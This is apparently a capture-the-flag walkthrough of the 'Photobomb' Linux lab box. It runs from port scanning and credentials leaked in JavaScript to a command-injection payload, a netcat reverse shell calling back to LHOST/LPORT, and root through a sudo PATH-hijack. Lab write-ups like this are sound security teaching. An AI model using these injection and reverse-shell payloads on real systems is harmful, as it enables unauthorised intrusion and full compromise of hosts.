Box: Photobomb
Level: Easy
OS: Linux
Lets get started
Recon
PortScanning
command:sudo nmap -A -v -p- -T4 10.129.228.60
Nmap scan report for 10.129.228.60
Host is up, received conn-refused (0.22s latency).
Scanned at 2023-11-03 11:35:47 WAT for 17s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwlzrcH3g6+RJ9JSdH4fFJPibAIpAZXAl7vCJA+98jmlaLCsANWQXth3UsQ+TCEf9YydmNXO2QAIocVR8y1NUEYBlN2xG4/7txjoXr9QShFwd10HNbULQyrGzPaFEN2O/7R90uP6lxQIDsoKJu2Ihs/4YFit79oSsCPMDPn8XS1fX/BRRhz1BDqKlLPdRIzvbkauo6QEhOiaOG1pxqOj50JVWO3XNpnzPxB01fo1GiaE4q5laGbktQagtqhz87SX7vWBwJXXKA/IennJIBPcyD1G6YUK0k6lDow+OUdXlmoxw+n370Knl6PYxyDwuDnvkPabPhkCnSvlgGKkjxvqks9axnQYxkieDqIgOmIrMheEqF6GXO5zz6WtN62UAIKAgxRPgIW0SjRw2sWBnT9GnLag74cmhpGaIoWunklT2c94J7t+kpLAcsES6+yFp9Wzbk1vsqThAss0BkVsyxzvL0U9HvcyyDKLGFlFPbsiFH7br/PuxGbqdO9Jbrrs9nx60=
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY+wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n+SO0T80x1wW3g19Ew=
| 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT+MONekDg5xYZ6D
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:36
Completed NSE at 11:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:36
Completed NSE at 11:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:36
Completed NSE at 11:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.44 seconds
From our scan we have 2 open ports, port 22 which runs ssh and port 80 which runs the http service. Weāll focus our enumeration today on port 80
Enumeration
Navigate to the webpage
Add this domain name to your /etc/hosts file
Navigate to the webpage again,
Checking the page source you should see a javascript file
Yeah, lets view the content of this
Now, that looks like creds
Something like
username:pH0t0 password:b0Mb!
Clicking on the āclick hereā directs you to the /printer directory which requires creds to login, weāll be using the creds we found in the javascript file
nice nice, we are logged in
This webpage just allows us to download an image so we can print it
Lets try to download an image, but this time weāll capture the request using burpsuite and send it over to burp repeater
We can see there are 3 parameters photo, filetype and dimensions
The parameter filetype is actually vulnerable to blind command injection. Lets exploit this
Exploitation
Lets try to cause a 10 seconds delay
payload:;ping+-c+10+127.0.0.1
This actually caused a 10 secinds delay
Lets spawn a reverse shell with this
payload:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f
Ensure you edit the LHOST and LPORT, also ensure it is url encoded
Checking my netcat listener
nice nice, lets stabilize our shell
python3 -c "import pty;pty.spawn('/bin/bash')"
ctrl + z (To Background)
stty raw -echo && fg
export TERM=xterm
We can go ahead now to escalate our privileges
Privilege Escalation
Running the sudo -l command
This user can run this script with sudo privileges.
Lets view the content of the script
From the above screenshot we know where the photobomb.log files are stored. We can also see that the location is not using an āabsolute pathā. Therefore we can take the advantage of binaries or traverse path approaches.
Navigate to the /tmp dir, lets see if we can find something interesting in those logs with the āfindā binary.
echo bash > find
chmod 777 find
sudo PATH=$PWD:$PATH /opt/cleanup.sh
We were able to spawn a root shell.
That will be all for today
Back To Home